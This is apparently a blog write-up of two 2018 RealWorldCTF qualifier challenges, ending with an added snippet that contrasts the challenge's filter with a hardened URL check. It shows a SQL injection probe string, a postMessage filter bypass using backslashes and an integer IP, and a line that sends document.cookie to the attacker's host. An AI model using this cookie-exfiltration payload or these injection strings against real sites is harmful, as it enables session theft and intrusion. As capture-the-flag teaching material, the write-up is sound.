NiNi's Den

2018::RealWorldCTF::Qual

2018/07/30

RealWorld CTF is very interesting, and this is the hardest check-in challenge I've ever seen.

Advertisement

This challenge gave nothing but one line:

This platform is under protection. DO NOT hack it.

I tried not to hack the site, but I couldn't find anything.
Then I found something interesting, like this one:

It seems to use a WebSocket to fetch some information and then render it in a template view.
So, let's change the hash-like string in the URL.

When the URL is https://realworldctf.com/contest/5

When the URL is https://realworldctf.com/contest/5b5bc8c532a7ca004d2d0f64 (keep the hash-like string the same length as the original)

Did you say database?
https://realworldctf.com/contest/' or '1'='1' --

My teammate kaibro told me that Chaitin has a product called SQLChop.... ohh.... advertisement... got it.
It took me half a day to find the flag.

Dot Free

There are some JS functions on the web page:

function lls(src) {
    var el = document.createElement('script');
    if (el) {
        el.setAttribute('type', 'text/javascript');
        el.src = src;
        document.body.appendChild(el);
    }
};

function lce(doc, def, parent) {
    // ...
};

window.addEventListener('message', function (e) {
    if (e.data.iframe) {
        if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
            if (e.data.iframe.type == "iframe") {
                lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
            } else {
                lls(e.data.iframe.value)
            }
        }
    }
}, false);

window.onload = function (ev) {
    postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}

I also found some keywords like login passwd and login account in the CSS, so I thought we could try XSS.

We append a string to the URL; the xxxxxxxx part should be replaced by the IP in integer form:
http://13.57.104.34/?{"iframe":{"value":"http:\\\\xxxxxxxx"}}

And put a JavaScript file on your machine:
document.location="http:\\\\my.ip.put.here/a?cookie="+document.cookie;

Then check the Apache log to get the flag:
13.57.104.34 - - [29/Jul/2018:14:36:15 +0000] "GET /a?cookie=flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 496
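As an added example (not code from the original write-up), here is the challenge's string filter next to a check that parses the URL the way the browser will before deciding; the host app.example, the allowlist and the decimal loopback address 2130706433 are constructed for illustration.

```javascript
// Added example, not code from the original write-up: the challenge's
// string filter next to a check that parses the URL first. Only the
// WHATWG URL class is used (available in browsers and Node.js).

// The string tests from the challenge's message handler. Note that the
// original `typeof(e.data.iframe != 'object')` is always "boolean", so
// that clause never rejects anything; it is omitted here.
function originalFilter(value) {
  return (
    typeof value === 'string' &&
    value.length > 0 &&
    value.indexOf('.') === -1 &&
    value.indexOf('//') === -1 &&
    value.indexOf('\u3002') === -1   // the ideographic full stop "。"
  );
}

// What the browser will actually fetch: for http(s), URL parsing treats
// "\" as "/" and renders an all-digit host as a dotted IPv4 address.
function resolvedHost(value, base) {
  try {
    return new URL(value, base).hostname;
  } catch (e) {
    return null;   // unparsable input is rejected
  }
}

// Hardened check: parse, then compare the resulting scheme and host with
// an allowlist (the allowlist itself is an assumption for this example).
function hardenedFilter(value, base, allowedHosts) {
  let url;
  try {
    url = new URL(value, base);
  } catch (e) {
    return false;
  }
  const schemeOk = url.protocol === 'http:' || url.protocol === 'https:';
  return schemeOk && allowedHosts.includes(url.hostname);
}

// Constructed samples: app.example stands in for the challenge host and
// 2130706433 is 127.0.0.1 written as a single decimal integer.
const BASE = 'http://app.example/';
const SAMPLES = ['static/loader', 'http:\\\\2130706433/x'];
for (const s of SAMPLES) {
  console.log(s, originalFilter(s), resolvedHost(s, BASE),
              hardenedFilter(s, BASE, ['app.example']));
}
```

In the real handler the hardened check should also compare e.origin with the expected sender, since the challenge's listener accepts messages from any origin.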

Author: NiNi

Link: http://blog.terrynini.tw/en/2018-RealWorldCTF-Qual/

Publish date: July 30th 2018, 2:11:03 pm

Update date: June 21st 2024, 1:46:00 am

License: This article is licensed under CC BY-NC 4.0
